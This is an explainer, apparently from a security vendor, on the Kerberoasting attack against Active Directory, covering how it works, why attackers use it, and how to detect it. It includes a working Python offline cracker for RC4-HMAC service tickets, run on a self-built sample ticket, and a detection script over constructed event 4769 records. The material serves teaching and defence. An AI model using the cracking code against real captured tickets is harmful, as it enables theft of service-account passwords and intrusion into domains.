
Kerberoasting

Kerberos keeps user passwords off the wire and spares users from re-entering them for every service, but the way it protects service tickets exposes Active Directory domains to Kerberoasting. Here is what you need to know about this common attack technique.


What is Kerberoasting?

Kerberoasting is an attack technique that targets Kerberos, the authentication protocol used by Active Directory. Kerberos relies on symmetric-key cryptography and a key distribution center (KDC), a role every domain controller plays, to verify identities and issue tickets.

A Kerberoasting attack starts when an authenticated domain user requests a service ticket for a service principal name (SPN). An SPN uniquely identifies one instance of a service (for example, a SQL Server instance on a given host) and is registered on the account the service runs as.

Part of the returned ticket is encrypted with a key derived from that service account's password. The attacker saves the ticket and tries candidate passwords against it offline until one decrypts it, which recovers the account's plaintext password.


How Kerberoasting works

Kerberoasting abuses a routine step of the protocol. After logging on, a user holds a ticket-granting ticket (TGT) issued by the KDC and presents it to the ticket-granting service (TGS) to obtain a service ticket for any SPN in the domain. The KDC does not check whether the requester is authorized to use that service; it encrypts the ticket with the service account's long-term key and hands it back. Put simply: Kerberos lets domain users reach services without re-entering or storing passwords, and attackers have specialized tools that automate the following steps:

  1. Enumerating service accounts: The attacker, already holding a foothold as any domain user, queries Active Directory over LDAP for accounts with an SPN set (servicePrincipalName=*). Computer accounts also have SPNs, but their passwords are long and machine-generated, so the targets of interest are user accounts that run services.
  2. Requesting tickets: Using a valid TGT, the attacker asks the TGS for a service ticket for each targeted SPN. Tools typically request RC4-HMAC (encryption type 23) wherever the account still allows it, because an RC4 key is simply the account's unsalted NT hash, which cracks far faster than an AES key.
  3. Ticket granting: The domain controller issues the service ticket without checking whether the requester will ever be allowed to use the service. The ticket's encrypted part is protected with the service account's long-term key: its NT hash for RC4, or a PBKDF2-derived key for AES.
  4. Extracting the ticket: The attacker pulls the encrypted ticket out of the TGS reply (or out of the local ticket cache) and writes it in a cracker-friendly format such as hashcat's $krb5tgs$23$ line.
  5. Offline cracking: The attacker runs John the Ripper or Hashcat against the saved ticket, deriving a key from each candidate password and testing whether it decrypts the ticket. This stage never touches the domain again, so it produces no network telemetry; when a candidate succeeds, the attacker holds the service account's plaintext password.
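The program below walks the cracking stage of this procedure end to end for an RC4-HMAC (etype 23) ticket. It is an added example, not code from Vectra or from any cracking tool: it builds a sample ticket in-process from a constructed stand-in for the DER EncTicketPart and a deliberately weak service-account password (Summer2024!), formats it as the $krb5tgs$23$ line that hashcat and John consume, and then recovers the password with exactly the check a cracker performs: derive the NT hash of each candidate, decrypt per RFC 4757 and verify the HMAC. The MD4 routine is included because hashlib often lacks it on OpenSSL 3; everything runs offline.

```python
"""Offline cracking of an RC4-HMAC (etype 23) Kerberos service ticket (added example).

The ticket is constructed in-process from a known weak password; nothing here
talks to a domain controller.
"""
import hashlib
import hmac
import os
import struct
from typing import Optional

KU_TICKET = 2  # RFC 3961 key-usage number for a ticket's encrypted part (service key)


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320; hashlib may not provide it on OpenSSL 3 builds."""
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rol((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = rol((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC long-term key is the NT hash: MD4 of the UTF-16LE password, no salt."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (KSA + PRGA)."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes = b"") -> bytes:
    """RFC 4757 encryption: checksum(16) || RC4(K3, confounder || plaintext)."""
    confounder = confounder or os.urandom(8)
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    checksum = _hmac_md5(k1, confounder + plaintext)
    k3 = _hmac_md5(k1, checksum)
    return checksum + rc4(k3, confounder + plaintext)


def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes) -> Optional[bytes]:
    """Inverse of rc4_hmac_encrypt; returns None when the key is wrong (HMAC mismatch)."""
    checksum, ciphertext = edata[:16], edata[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    plain = rc4(_hmac_md5(k1, checksum), ciphertext)
    if not hmac.compare_digest(_hmac_md5(k1, plain), checksum):
        return None
    return plain[8:]  # drop the 8-byte confounder


def to_hashcat(user: str, realm: str, spn: str, edata: bytes) -> str:
    """hashcat mode 13100 / John krb5tgs line: $krb5tgs$23$*user$realm$spn*$checksum$ciphertext."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


def crack(edata: bytes, candidates) -> Optional[str]:
    """The cracker's inner loop: one NT hash and one RC4-HMAC decrypt per candidate password."""
    for pw in candidates:
        if rc4_hmac_decrypt(nt_hash(pw), KU_TICKET, edata) is not None:
            return pw
    return None


# Constructed stand-in for the DER EncTicketPart a DC would produce (real ones begin 0x63 0x82).
FAKE_ENC_TICKET_PART = b"\x63\x82\x04\x10\x30\x82\x04\x0c" + b"constructed EncTicketPart body, not real Kerberos data"
SERVICE_PASSWORD = "Summer2024!"  # deliberately weak password used only to build the sample ticket
SAMPLE_TICKET = rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), KU_TICKET, FAKE_ENC_TICKET_PART)
WORDLIST = ["Password1", "Welcome1", "P@ssw0rd", "Summer2024!", "Winter2023!"]  # constructed wordlist

if __name__ == "__main__":
    print(to_hashcat("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", SAMPLE_TICKET))
    print("recovered password:", crack(SAMPLE_TICKET, WORDLIST))
```

Each guess against an RC4 ticket costs one MD4 plus a few HMAC-MD5 and RC4 operations, whereas an AES ticket needs a PBKDF2 derivation (4096 iterations by default) per guess. That cost difference is why attackers request RC4 whenever the account permits it, and why a request for an RC4 ticket from an account that supports AES is worth alerting on.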


Why attackers use Kerberoasting

Attackers use Kerberoasting to collect service tickets encrypted under service-account keys in a Microsoft Active Directory environment and crack them offline into plaintext passwords. Because the tickets are obtained through legitimate protocol behavior, the collection step looks like ordinary activity. A cracked service account often carries elevated privileges, letting attackers move laterally within the network, access sensitive data, or compromise further systems.

Here are the reasons why attackers use Kerberoasting:

Privilege Escalation

  • Access to High-Privilege Accounts: Service accounts often have elevated permissions. Gaining their credentials allows attackers to perform actions that require higher privileges.
  • Lateral Movement: With access to service accounts, attackers can move across different systems within the network, expanding their reach.

Stealthy Exploitation

  • Low Detection Risk: Kerberoasting can be executed by any authenticated domain user without triggering immediate security alerts because requesting service tickets is standard behavior.
  • Offline Password Cracking: Since the password cracking happens offline, it avoids detection by network monitoring tools.

Exploitation of Weak Security Practices

  • Weak or Unchanged Passwords: Service account passwords are often weak, set once years ago and never rotated because changing them risks breaking the service, which leaves them within reach of an offline cracker.
  • Misconfigurations: SPNs registered on ordinary user accounts (or on privileged ones such as Domain Admins), and accounts that still accept RC4 tickets, make the attack easier to perform and its payoff larger.

No Special Privileges Needed

  • Accessible by Regular Users: Any authenticated domain user can request a service ticket for any SPN, making it a widely accessible attack vector.
  • Minimal Network Footprint: The attacker needs only the normal Kerberos exchange with a domain controller (TCP/UDP port 88) that every domain member performs; no access to the target service hosts or other sensitive servers is required.

How to detect Kerberoasting attacks

To protect your organization against Kerberoasting, early detection is key. Service-ticket requests are normal traffic, so volume alone tells you little; look for the patterns this technique produces (one account requesting tickets for many SPNs in a short window, RC4 tickets requested for accounts that support AES, tickets for services the user never actually connects to) and use behavior-based detections to separate them from routine requests. On domain controllers, Windows Security event 4769 (a Kerberos service ticket was requested) records the requesting account, the service name and the ticket encryption type, and is the raw material for such detections.

Vectra AI provides two types of Kerberoasting detections: 

  • The SPN Sweep detection focuses on identifying attempts to enumerate Service Principal Names (SPNs) within your Active Directory environment. This shows you when attackers might be gathering information about service accounts they can target.
  • The Cipher Downgrade detection looks for attempts to request Kerberos tickets using weaker encryption types, such as RC4 encryption. This shows you when attackers are likely manipulating the system to generate tickets that are easier to crack.

The Account Scan detection identifies attempts to query the Kerberos authentication service for valid user accounts — a common precursor to Kerberoasting.
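The following Python script shows the logic behind the SPN-sweep and cipher-downgrade indicators described above, run over constructed Windows event 4769 records. It is an added example, not Vectra's detection code or telemetry: the events, account names, thresholds and the two-minute window are all assumptions chosen for illustration. It excludes computer accounts and krbtgt as targets because their keys are not crackable in practice, which is the kind of tuning that keeps the RC4 rule from flooding on machine-to-machine traffic.

```python
"""Kerberoasting indicators over Windows Security event 4769 records (added example).

Events below are constructed, not real telemetry; field names follow the 4769 event XML.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17           # etype 23: key is the unsalted NT hash, fast to crack offline
AES_TYPES = {0x11, 0x12}  # AES128 / AES256: PBKDF2-derived keys, far slower to crack

# ServiceName in 4769 is the service account's sAMAccountName, so a computer account ends in "$".
SAMPLE_EVENTS = [
    # alice: a routine AES ticket to a file server, then one RC4 ticket for a legacy service account
    {"ts": "2024-05-01T09:00:01", "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "FS01$",
     "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.5"},
    {"ts": "2024-05-01T09:00:30", "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_legacy",
     "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.5"},
    # bob: three AES tickets spread over an hour, a normal working pattern
    {"ts": "2024-05-01T09:05:00", "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_iis",
     "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.9"},
    {"ts": "2024-05-01T09:35:00", "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.9"},
    {"ts": "2024-05-01T10:02:00", "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.9"},
    # DC01$: machine-to-machine RC4 request; the target is a computer account, so not a useful target
    {"ts": "2024-05-01T09:08:00", "TargetUserName": "DC01$@CORP.LOCAL", "ServiceName": "WS07$",
     "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.2"},
] + [
    # mallory: six RC4 tickets for six different service accounts within 25 seconds
    {"ts": f"2024-05-01T09:10:{5 * i:02d}", "TargetUserName": "mallory@CORP.LOCAL", "ServiceName": svc,
     "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.77"}
    for i, svc in enumerate(["svc_sql", "svc_iis", "svc_backup", "svc_sharepoint", "svc_exchange", "svc_report"])
]


def is_user_service(service_name: str) -> bool:
    """Only SPNs on user accounts are crackable targets; computer accounts and krbtgt are noise here."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def rc4_user_spn_requests(events):
    """Cipher-downgrade indicator: RC4 service tickets for user-account SPNs as (ts, user, service)."""
    return [
        (e["ts"], e["TargetUserName"], e["ServiceName"])
        for e in events
        if e["TicketEncryptionType"] == RC4_HMAC and is_user_service(e["ServiceName"])
    ]


def spn_sweeps(events, threshold=5, window=timedelta(minutes=2)):
    """SPN-sweep indicator: one requester obtaining tickets for >= threshold distinct user-account
    services inside a sliding window. Returns {requester: peak distinct services in any window}."""
    by_user = defaultdict(list)
    for e in events:
        if is_user_service(e["ServiceName"]):
            by_user[e["TargetUserName"]].append((datetime.fromisoformat(e["ts"]), e["ServiceName"]))
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        in_window, start, peak = defaultdict(int), 0, 0
        for ts, svc in reqs:
            in_window[svc] += 1
            while ts - reqs[start][0] > window:  # slide the left edge forward
                old = reqs[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            flagged[user] = peak
    return flagged


if __name__ == "__main__":
    for hit in rc4_user_spn_requests(SAMPLE_EVENTS):
        print("RC4 ticket for user-account SPN:", hit)
    for user, n in spn_sweeps(SAMPLE_EVENTS).items():
        print(f"SPN sweep: {user} requested {n} distinct services within 2 minutes")
```

In a real deployment the RC4 rule should be tuned against the account's msDS-SupportedEncryptionTypes (an RC4 ticket for an account that only supports RC4 is a hygiene finding, not an attack), and the sweep threshold should be baselined per environment, since monitoring and backup accounts legitimately touch many services.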
